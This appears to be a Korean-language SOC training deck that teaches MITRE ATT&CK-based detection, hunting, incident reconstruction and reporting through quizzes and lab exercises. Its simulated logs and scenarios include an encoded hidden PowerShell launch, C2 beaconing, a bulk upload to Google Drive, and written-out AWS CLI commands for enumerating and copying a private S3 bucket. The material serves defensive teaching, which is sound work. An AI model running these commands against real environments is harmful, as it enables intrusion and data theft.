Q4	T1071.001 C2 via HTTPS — Beaconing 패턴
Q5	T1490 Inhibit System Recovery → 다음: T1486 Ransomware 암호화
Q6	Spraying = 여러 계정 각 1~2회(잠금 우회) / Brute Force = 한 계정 반복(잠금 발생)
Q7	T1566.001(Initial Access) + T1204.002 + T1059.001(Execution) + T1027(Def.Eva.)
Q8	4698 = 예약 작업 등록 / T1053.005 Scheduled Task
Q9	lsass.exe 등 민감 프로세스 메모리 접근 탐지 → T1003.001 LSASS Dump 핵심
Q10	탐지 룰 = 알려진 패턴 자동 감지 / Hunting = 미지 패턴 분석가가 능동 탐색

#	핵심 답변
Q11	DCSync = 비DC에서 복제 권한 요청 / WinEvent 4662 (Properties: DS-Replication-Get-Changes)
Q12	LOLBin = 정상 내장 도구 악용 / certutil, mshta, regsvr32, wmic, bitsadmin 등
Q13	Defense Evasion (TA0005) — 가장 많은 Technique 보유
Q14	Lateral Movement + Collection (자격증명 탈취 → 이동 → 수집)
Q15	Medium = 단일 센서, 대체 설명 가능 / High = 다중 센서 일치, 대체 설명 불가
Q16	짧은 시간 내 지리적 불가능 위치 변경 / T1078 Valid Accounts 탐지에 활용
Q17	Red Team = 탐지 없이 공격 / Purple Team = 공격+방어 협력으로 탐지 개선
Q18	로그 수집 계획 / 탐지 룰 개선 백로그 / Purple Team 우선순위 결정
Q19	시작점(Start) → 핵심 진행(ATT&CK TTP) → 영향(Impact) → 다음 행동(Action)
Q20	krbtgt 비밀번호 48시간 간격 2회 연속 변경 필수 (1회만으로는 부족)

보강 설명 퀴즈 해설입니다. 각 팀이 답을 발표한 후 해설을 공개합니다. 틀린 부분은 왜 틀렸는지 함께 토론하면 더 효과적입니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

퀴즈 해설핵심 답변복습 포인트

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
퀴즈 해설를 고를 때 대체 설명도 함께 적기

추가 헌팅 실습: Lateral Movement RDP 체인 추적

A→B→C→D 형태의 RDP 내부 이동 체인을 로그에서 재구성하는 헌팅 실습

헌팅 실습

헌팅 가설

"만약 공격자가 RDP를 통해 내부 이동을 했다면, 동일 출발 IP에서 여러 내부 호스트로 순차적 RDP 연결(LogonType 10)이 30분 이내 발생했을 것이다."

데이터 원천

WinEvent 4624 (LogonType=10: RemoteInteractive)
또는 Sysmon EventID 3 (Network Connection, Port 3389)
Firewall 로그 (내부 → 내부 TCP/3389)

# Splunk 헌팅 쿼리 (WinEvent 4624) index=winevent EventCode=4624 LogonType=10 # RemoteInteractive(RDP) # 내부 IP 대역만 IpAddress IN ("10.*", "172.16.*", "192.168.*") | bucket _time span=30m | stats dc(ComputerName) as unique_dest values(ComputerName) as dest_list by _time, IpAddress, AccountName | where unique_dest >= 3 # 30분 내 3개 이상 내부 시스템 RDP = 의심

⚠️ 오탐 제외: 정상 RDP 점프 서버(Bastion Host) IP는 제외 목록에 추가. 또한 IT 관리팀 계정은 별도 임계값 적용

보강 설명 Lateral Movement 탐지 헌팅 실습입니다. RDP 연결 체인을 추적하는 가설을 세우고 실제 쿼리로 구현하는 과정을 다룹니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

Lateral Movement…RDP 체인WinEvent 4624

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
Lateral Movement 헌팅를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

SOC 분석가 역할 발전 경로와 ATT&CK 역량

ATT&CK 숙련도가 높아질수록 더 복잡한 위협을 다루는 역할로 발전한다

커리어 경로

 Tier 1 분석가경보 Triage 및 분류
기본 ATT&CK 매핑
플레이북 기반 대응
에스컬레이션 판단
ATT&CK 활용: Tier 1~2 수준 이해
 Tier 2 분석가복잡 사건 심층 분석
공격 체인 재구성
IR 지원
탐지 룰 튜닝
ATT&CK: 멀티 Technique 매핑
 탐지 엔지니어ATT&CK 기반 룰 설계
Coverage 분석·관리
Sigma 룰 작성
자동화 파이프라인
ATT&CK: Detection Strategy 전문
 Threat Hunter가설 기반 능동 탐색
CTI-TTP 연동
Purple Team 운영
미지 위협 발굴
ATT&CK: 전체 매트릭스 심화

✅ 이번 모듈로 얻은 역량: Tier 1 매핑 능력 + Tier 2 체인 재구성 능력 + 기초 탐지 엔지니어링 + 기초 Hunting 가설 수립 — 실무 투입 준비 완료

보강 설명SOC 분석가로서의 커리어 경로를 보여줍니다. ATT&CK 역량이 높아질수록 더 높은 레벨의 업무를 할 수 있습니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

SOC 커리어Tier 1/2/3탐지 엔지니어

설명 확장

SOC 커리어를 목적-기술-근거 관점으로 다시 정리하기
Tier 1/2/3와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

탐지 엔지니어 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

실전 로그 분석: 이메일 헤더 읽기와 피싱 판단

DKIM·SPF·DMARC·Received 헤더를 읽어 피싱 메일의 발신 경로를 추적한다

이메일 분석

# 실제 피싱 메일 헤더 예시 (분석 대상) Return-Path: <bounce@phish-domain.xyz> From: "CFO Kim" <cfo@company.co.kr> # 위장! # Received 헤더 (최하단이 실제 발신 서버) Received: from mail.company.co.kr # 위장 도메인 by mx.target.com with ESMTP Received: from 185.220.101.45 # 실제 발신 IP (Tor 출구) by mail.company.co.kr # 인증 결과 Authentication-Results: dkim=fail header.d=company.co.kr spf=fail smtp.mailfrom=phish-domain.xyz dmarc=fail action=none X-Mailer: The Bat! 9.3 (UNREG) # 비표준 클라이언트

헤더 분석 결과

From 위장: 표시 이름은 CFO Kim이지만 실제 발신은 피싱 도메인
실제 발신 IP: 185.220.101.45 → Tor 출구 노드 (공격자 은닉)
DKIM FAIL: company.co.kr의 서명이 없음 → 위조 발신
SPF FAIL: phish-domain.xyz가 company.co.kr을 사칭
DMARC FAIL: 정책 위반 (하지만 action=none이면 통과 가능)

⚠️ ATT&CK 매핑:
T1566.001 Spearphishing Attachment
근거: DKIM/SPF/DMARC FAIL + From 위장 + Tor IP
Confidence: High

보강 설명 이메일 헤더 분석은 피싱 탐지의 기본입니다. Received 헤더, DKIM, SPF, DMARC를 읽는 방법을 실습합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

이메일 헤더DKIM SPF DMARCReceived 헤더

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
이메일 헤더를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실전 종합: 복합 소스 로그 상관 분석

메일GW + EDR + DNS + Firewall 로그를 동시에 보고 전체 체인을 재구성하라 (20분)

종합 실전

━ 메일GW (08:44) ━ RECV: invoice_Q4.xlsm (DKIM:FAIL, VT:5/94) To: accounts@acme.co.kr ━ EDR (09:03) ━ EXCEL.EXE → wscript.exe → powershell.exe -w hidden -enc c3lzdGVtKCdubC... ━ DNS (09:04) ━ QUERY: cdn-update-api.net (Age: 3days, VT:15/94) RESP: 45.77.88.12 ━ Firewall (09:05) ━ ALLOW: 10.0.0.22→45.77.88.12:443 Duration: 4h12m | TX: 1.2MB | RX: 847MB ━ File Audit (13:22) ━ COPY \\filesvr\HR\* → C:\Users\Public\tmp\ Files: 2,140 | Size: 8.4GB ━ Proxy (13:58) ━ UPLOAD: drive.google.com/upload archive.zip 8.4GB | User: accounts@acme.co.kr

분석 과제 (20분)

① 전체 공격 체인을 시간 순서로 정렬
② 각 이벤트에 ATT&CK Tactic + Technique 매핑
③ 각 매핑의 근거 한 줄 기재
④ 탐지되지 못한 단계가 있는가? 왜?
⑤ 30초 보고 문장 완성

💡 힌트:
로그 소스가 5개(메일GW, EDR, DNS, Firewall, 파일감사, Proxy)입니다. 각 소스가 보여주는 Technique가 무엇인지 먼저 파악한 후 시간 순서로 연결하세요

보강 설명 복합 시나리오 로그 세트입니다. 여러 소스의 로그가 섞여 있고, 수강생이 시간 순서 정렬과 ATT&CK 매핑을 동시에 해야 합니다. 가장 어려운 실습이지만 실무와 가장 유사합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

복합 시나리오다중 소스 로그체인 재구성

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
복합 시나리오를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

복합 시나리오 해설 — 전체 공격 체인 완성

08:44 피싱 수신 → 13:58 Google Drive 유출 — 5시간 14분 동안의 완전한 침해

종합 실전 해설

시간	로그 소스	Tactic	Technique	핵심 근거	C
08:44	메일GW	Initial Access	T1566.001	xlsm 첨부, DKIM FAIL, VT 5/94	High
09:03	EDR	Execution	T1059.001 + T1027	EXCEL→wscript→PS -enc 체인	High
09:04	DNS	C&C	T1071.001 + T1568	3일 된 도메인 VT 15/94 → C2 인프라	High
09:05~	Firewall	C&C	T1071.001 Beaconing	4h12m 지속, 소량 TX/대량 RX (명령+결과)	High
13:22	파일감사	Collection	T1039 + T1560	HR 폴더 2,140개 복사 → Public\tmp 수집	High
13:58	Proxy	Exfiltration	T1567.002	8.4GB archive.zip → Google Drive 업로드	High

🚨 탐지 공백: Execution(09:03) 탐지했어야 했지만 wscript.exe 체인 탐지 룰 없음. DNS(09:04) 탐지했어야 했지만 3일 신규 도메인 경보 없음. 이 2개 공백이 전체 피해로 이어짐

📝 30초 보고: "08:44 피싱 첨부파일(T1566.001) 실행 후 PowerShell C2 채널(T1071.001)이 4시간 이상 유지되었습니다. 13시 22분 HR 데이터 2,140개가 수집(T1039)되어 13시 58분 Google Drive로 8.4GB가 유출(T1567.002)되었습니다. 즉시 계정 비활성화와 Google Drive 세션 차단을 권고합니다."

보강 설명 복합 시나리오 해설입니다. 6개 로그 소스를 교차해서 전체 공격 체인을 완성합니다. 수강생이 발표 후 공개합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

복합 해설전체 매핑표30초 보고

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
복합 해설를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

ATT&CK 기반 보안 운영 주간·월간 루틴

작은 반복이 쌓여서 SOC 역량이 된다 — 일·주·월 단위 ATT&CK 활용 습관

운영 루틴

 일별 (Daily)
경보 티켓에 ATT&CK Technique 태그 부착
분석 보고서에 30초 보고 문장 포함
미해결 Confidence Low 항목 추가 로그 수집 요청
새 IOC를 SIEM 차단 목록에 추가


 주별 (Weekly)
경보 트렌드 분석 — 이번 주 가장 많이 뜬 Technique는?
오탐 경보 원인 분석 → 룰 튜닝 1건
헌팅 가설 1개 수립 및 실행
팀 공유 — 이번 주 배운 것, 발견한 것


 월별 (Monthly)
Coverage 점수 업데이트 (신규 룰 반영)
주요 ATT&CK 업데이트 확인 (릴리즈 노트)
Atomic Red Team으로 탐지 룰 1개 검증
CTI 보고서 1건 분석 → TTP 추출 → Coverage 대조

💡 팀 문화로 만들기: 개인 노력보다 팀 루틴으로 정착시키는 것이 지속성을 높입니다. 주간 SOC 미팅에 "이번 주 ATT&CK 분석 결과" 코너를 추가하는 것부터 시작해 보세요

보강 설명ATT&CK을 실무에 지속적으로 적용하기 위한 주간 루틴을 제안합니다. 작은 습관이 쌓여서 SOC 역량이 됩니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

주간 루틴탐지 룰 검토Coverage 업데이트

설계 포인트

주간 루틴에 필요한 Data Source를 먼저 정리하기
탐지 룰 검토를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

실습 6: 나만의 탐지 룰 챌린지 — 처음부터 끝까지

강사 도움 없이 — ATT&CK 페이지 참조해서 관심 Technique의 탐지 룰을 완성하라

최종 실습

챌린지 과제

Technique 선택: 개인적으로 가장 흥미롭거나 실무에서 필요한 Technique 1개 선택
ATT&CK 페이지 분석: attack.mitre.org에서 해당 Technique의 Detection 섹션 분석
Data Source/Component 확인: 어떤 로그에서 무엇을 봐야 하는지 파악
SIEM 쿼리 또는 Sigma 룰 작성: 탐지 조건 구현
오탐 필터 추가: 알려진 정상 케이스 제외
Confidence 수준 예측: 이 룰의 정탐률이 어느 정도일지 예측

Technique 선택 힌트

쉬움: T1110 Brute Force, T1053 Scheduled Task
보통: T1071 C2 Beaconing, T1505.003 WebShell
어려움: T1558 Kerberoasting, T1055 Process Injection
도전: T1003.006 DCSync, T1568 DGA Detection

⏱️ 시간 배분 제안:
ATT&CK 페이지 분석 5분 → 쿼리 작성 10분 → 오탐 필터 3분 → 발표 준비 2분 = 총 20분

보강 설명마지막 실습입니다. 수강생이 관심 있는 Technique를 스스로 선택해 탐지 룰을 처음부터 끝까지 작성합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

T1110T1053실습 6

설명 확장

T1110 기준으로 첫 단서를 먼저 분류하기
T1053를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

Module 5 전체 복습: 파트별 핵심 학습 포인트

12파트를 거쳐 ATT&CK을 해석 도구로 활용하는 분석가로 성장했다

전체 복습

 Part 0~2 기초
ATT&CK = 판단 구조화 도구
Tactic(왜) → Technique(어떻게) → Sub-tech(세부)
Data Source/Component → 로그 선택 기준
Coverage 0~3 성숙도 모델
Confidence = 근거의 밀도


 Part 3 Tactic 심화
14개 Tactic의 목적과 관찰 신호
각 Tactic 탐지 후 다음에 볼 Tactic
오탐 구분 = 맥락(시간·위치·행동) 분석
멀티시그널 상관 분석 = Confidence 상승


 Part 4~8 시나리오
피싱 → Execution → C2 → Collection → Exfil
웹침투: SQLi → WebShell → 내부 이동
계정악용: 이상 행동 기반 탐지
Beaconing: 주기성·크기·희귀 도메인
Password Spraying: 수평 패턴 탐지


 Part 9 탐지 엔지니어링
설계 사이클: Technique → 쿼리 → 튜닝 → 운영
Sigma Rule: 플랫폼 중립 표준 형식
오탐 튜닝: 화이트리스트·임계값·맥락
룰 품질: 정탐률·재현율·속도·검증


 Part 10 Hunting/Coverage
가설 수립 → 탐색 → 발견/미발견 → 개선
헌팅 플레이북 문서화
Coverage 공백 → 개선 백로그
Purple Team으로 검증 (점수 2→3)


 Part 11~12 실습·마무리
실습 6종: 매핑·쿼리·가설·체인·Coverage·나만의룰
캡스톤: 실제 공격 로그 종합 분석 발표
30초 보고 4단 프레임
실무 적용 체크리스트

보강 설명 모듈 전체를 복습합니다. 파트별로 가장 중요한 학습 포인트 하나씩을 짚어주고, 수강생이 직접 말하게 하면 더 효과적입니다. 대표 예시와 연결해 기억하면 이해가 더 오래 남습니다.

복습파트별 핵심통합 정리

이해 포인트

복습를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

치트시트 4: 이벤트 ID → ATT&CK 빠른 매핑 참조 카드

이벤트 ID를 보는 즉시 ATT&CK Technique가 떠오르도록 — 인쇄 가능 참조 카드

PART 12 · 부록

인증·계정 관련
EventID	ATT&CK
4624 (로그인 성공)	T1078 Valid Accounts
4625 (로그인 실패)	T1110 Brute Force
4648 (명시적 자격증명)	T1550 PtH
4672 (특수 권한)	T1078.002 Domain
4720 (계정 생성)	T1136 Create Account
4728/4732 (그룹 추가)	T1098 Manip.
4769 (TGS 요청)	T1558.003 Kerberoast
4776 (NTLM 인증)	T1550.002 PtH

프로세스·실행 관련
EventID	ATT&CK
4688 (프로세스 생성)	T1059 Execution
4698 (예약 작업 등록)	T1053.005
4104 (PS Script Block)	T1059.001 PowerShell
Sysmon 1 (프로세스)	T1059, T1204
Sysmon 8 (RemoteThread)	T1055 Injection
Sysmon 10 (ProcessAccess)	T1003.001 LSASS
Sysmon 13 (Registry)	T1547.001 Run Key
Sysmon 22 (DNS Query)	T1071.004 DNS

방어우회·영향 관련
EventID	ATT&CK
1102 (보안로그 클리어)	T1070.001
7036 (서비스 변경)	T1562.001 Impair
4662 (AD 객체 접근)	T1003.006 DCSync
5145 (공유 접근)	T1039 Network Share
Sysmon 3 (네트워크)	T1071, T1021
Sysmon 11 (파일생성)	T1505.003 WebShell
Sysmon 23 (파일삭제)	T1070.004
Sysmon 7 (DLL로드)	T1055 DLL Injection

보강 설명 SIEM 분석 시 가장 자주 참조하는 이벤트 ID를 카테고리별로 정리한 빠른 참조 카드입니다. 인쇄해서 책상에 붙여두면 분석 속도가 빨라집니다. 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

이벤트 ID 참조카드ATT&CK 매핑빠른 참조

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
이벤트 ID 참조카드·예외 조건·출력 필드를 함께 설계

내부자 위협 ATT&CK 분석: 정상 권한자의 이상 행동

내부자는 이미 합법적 접근 권한이 있다 — 행위 이상 탐지와 DLP가 핵심

내부자 위협

내부자 위협 유형별 ATT&CK

데이터 절취형: T1005(로컬 데이터) + T1039(공유 드라이브) + T1567(외부 업로드) — 퇴직 직전 급증
사보타주형: T1485(Data Destruction) + T1490(백업 삭제) + T1489(서비스 중지)
계정 남용형: T1078(Valid Accounts) + T1213(저장소 조회) + T1114(이메일 수집)
권한 남용형: T1098(계정 조작) + T1548(권한 남용) — 관리자 계정 오용

탐지 전략

Baseline 이탈: 평소보다 많은 파일 접근, 비업무 시간 활동
DLP 이벤트: 대용량 외부 전송, 비승인 USB, 클라우드 업로드
HR 연동: 퇴직 예정자, 성과 평가 문제자 모니터링 강화
Print 로그: 대량 인쇄 (기밀 문서 물리 반출)

# 내부자 위협 탐지 시나리오 # 1. 퇴직 2주 전부터 파일 접근 급증 11/01 \\filesvr\Product\ 접근: 23건 11/08 \\filesvr\Product\ 접근: 847건 ← 급증! # 2. USB 연결 후 대용량 파일 복사 11/08 17:32 USB CONNECT: SAMSUNG_T7_1TB 11/08 17:33-18:15 COPY: 4.2GB → USB # ATT&CK: T1039(Collection) + T1025(Removable Media)

🚨 윤리·법적 주의: 내부자 모니터링은 개인정보보호법과 노동법 준수 필수. 모니터링 정책이 취업 규칙에 명시되어 있어야 하며, 법무팀 검토 후 진행

보강 설명 내부자 위협은 외부 공격보다 탐지가 훨씬 어렵습니다. 내부자는 정상 자격증명과 접근 권한을 이미 갖고 있습니다. ATT&CK Valid Accounts와 Collection 중심으로 접근합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1078T1039내부자 위협

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1078·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

클라우드 침해 시나리오: IAM 액세스 키 탈취

GitHub에 노출된 AWS 키 → 자원 열거 → 권한 상승 → 데이터 탈취 체인

클라우드 시나리오

T1552.001 — GitHub에서 키 탈취

개발자가 AWS_ACCESS_KEY_ID를 소스코드에 하드코딩해 GitHub에 push → 자동화 스캐너(GitLeaks 등)로 공격자 발견

T1580 — 클라우드 인프라 열거

aws s3 ls, aws ec2 describe-instances, aws iam list-users 등으로 전체 환경 파악

T1098.001 — 추가 액세스 키 생성

자신만 아는 새 액세스 키 생성 → 원래 키 삭제되어도 접근 유지

T1530 — S3 버킷 데이터 탈취

aws s3 cp s3://private-bucket/ ./dump/ --recursive → 전체 버킷 다운로드

# CloudTrail — 이상 API 호출 탐지 eventTime: "2024-11-21T03:14:22Z" userAgent: aws-cli/2.13.0 Python/3.11 Linux sourceIPAddress: 185.220.101.47 # Tor IP eventName: ListBuckets eventName: CreateAccessKey userName: dev-pipeline-bot eventName: GetObject (×1,240 in 8min) bucketName: acme-private-customer-data

🚨 즉시 대응: ① 노출된 액세스 키 즉시 비활성화·삭제 ② CloudTrail에서 동일 키 사용 이력 전체 조회 ③ 생성된 추가 키 삭제 ④ 버킷 접근 로그에서 다운로드된 파일 목록 확인

보강 설명 클라우드 환경에서 IAM 키 탈취는 가장 흔한 초기 침투 방법입니다. GitHub에 실수로 올라간 액세스 키, 피싱으로 탈취된 콘솔 크리덴셜이 대표적입니다. CloudTrail 로그 분석이 핵심입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1552.001IAM 키 탈취CloudTrail

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1552.001 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

컨테이너 환경 ATT&CK: Kubernetes 주요 공격 패턴

컨테이너 탈출 · 클러스터 권한 남용 · 악성 이미지 배포 — 클라우드 네이티브 환경의 새로운 위협

컨테이너 보안

주요 컨테이너 공격 패턴

T1611 Escape to Host — 특권 컨테이너나 취약점으로 호스트 탈출. /proc/sysrq-trigger, cgroup 악용
T1610 Deploy Container — 권한 있는 악성 컨테이너 배포 (권한 상승 목적)
T1552.007 Container API에서 시크릿 탈취 — Kubernetes Secret, ConfigMap에서 민감 정보 추출
T1525 Implant Internal Image — 컨테이너 이미지 변조 후 Persistence 수립
T1609 Container Admin API 접근 — Docker API 소켓 직접 접근

탐지 포인트

권한 있는 컨테이너 실행: --privileged 플래그, hostPID/hostNetwork 사용
호스트 파일시스템 마운트: /etc, /var/run/docker.sock 마운트
kubectl exec 남용: 운영 클러스터 컨테이너에 직접 접속
비정상 이미지: 레지스트리 외부에서 이미지 풀
Kubernetes Audit Log: 비정상 API 호출, ClusterRoleBinding 생성

💡 보안 기준 도구: CIS Kubernetes Benchmark, kube-bench로 보안 설정 평가. Falco로 런타임 이상 행위 탐지

보강 설명 Kubernetes와 Docker 환경에서의 공격 패턴을 다룹니다. 컨테이너 탈출, 클러스터 권한 남용, 이미지 변조 등이 주요 공격 경로입니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

T1611T1610컨테이너 보안

이해 포인트

T1611를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
T1610 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

대규모 사고 대응: ATT&CK × NIST SP 800-61 연계

준비 → 탐지·분석 → 봉쇄·제거 → 복구 → 사후 검토 — 각 단계에서 ATT&CK이 하는 역할

대규모 IR

준비(Preparation)

ATT&CK 기반 플레이북 사전 작성 · Coverage 분석으로 탐지 공백 파악 · 통신 채널·에스컬레이션 경로 확립

탐지·분석(Detection & Analysis)

경보 → ATT&CK 매핑 → 공격 체인 재구성 → 피해 범위 예측 (다음 볼 Tactic) → Confidence 평가

봉쇄·제거(Containment & Eradication)

체인별 봉쇄 전략 수립: 네트워크 격리 · C2 차단 · 계정 비활성화 · Persistence 제거(예약작업·웹쉘·백도어계정)

복구·사후검토(Recovery & Lessons Learned)

복구 우선순위 (중요 자산 먼저) · 재발 방지 로드맵 · ATT&CK Coverage 개선 계획 · 탐지 공백 즉시 보완

Persistence 제거 체크리스트

☐ 예약 작업 전수 조사 및 비인가 항목 삭제
☐ 웹 서버 디렉토리 웹쉘 탐색 및 제거
☐ 레지스트리 Run Key 전수 조사
☐ 백도어 계정 식별 및 삭제
☐ 비인가 SSH 공개키 제거
☐ 시작 프로그램·서비스 전수 점검
☐ 크론탭 전수 조사 (Linux)

💡 봉쇄 전에 반드시: 증거 보존 우선 (메모리 덤프, 로그 백업, 네트워크 패킷 캡처) → 그 다음 격리·차단. 순서 바꾸면 포렌식 증거 손실

보강 설명 대규모 사고 발생 시 ATT&CK이 IR 절차에서 어떻게 활용되는지 보여줍니다. NIST SP 800-61의 4단계(준비-탐지-봉쇄-복구)와 ATT&CK을 연계합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

IR 프레임워크NIST SP 800-61봉쇄 전략

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
IR 프레임워크·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

ATT&CK 기반 경영진 보안 현황 보고

기술 용어 대신 비즈니스 리스크 언어로 — Coverage 현황을 경영진이 이해하는 방식으로 표현

경영진 보고

경영진 보고 지표 예시

보고 항목	이번 달	전월	추세
탐지 Coverage 비율	68%	61%	↑ +7%p
검증된 Coverage(점수 3)	42%	38%	↑ +4%p
평균 탐지 시간(MTTD)	4.2시간	8.1시간	↓ 개선
평균 대응 시간(MTTR)	6.8시간	6.2시간	↑ 악화
미탐지 고위험 Technique	12개	17개	↓ 개선
이번 달 탐지된 인시던트	3건	5건	↓ 개선

경영진 보고 문구 예시

"이번 달 우리 조직에서 가장 많이 사용되는 공격 기술 상위 5개 중 3개(60%)를 탐지할 수 있습니다. 특히 랜섬웨어 사전 행위 탐지 역량이 전월 대비 40% 향상되었습니다."

"다음 분기 투자 우선순위: Kerberoasting 탐지 룰 추가(AD 공격 방어)와 클라우드 IAM 이상 탐지 강화를 요청드립니다. 예상 소요: 개발자 2인·2주."

💡 핵심 원칙: 경영진 보고에 Technique ID(T1558.003)보다 "Kerberoasting — 도메인 비밀번호 탈취 공격" 처럼 업무 언어로 번역해서 표현하세요

보강 설명 경영진에게 ATT&CK 기반 보안 현황을 보고하는 방법입니다. 기술적 세부 사항 대신 비즈니스 리스크 관점으로 Coverage 현황을 표현합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

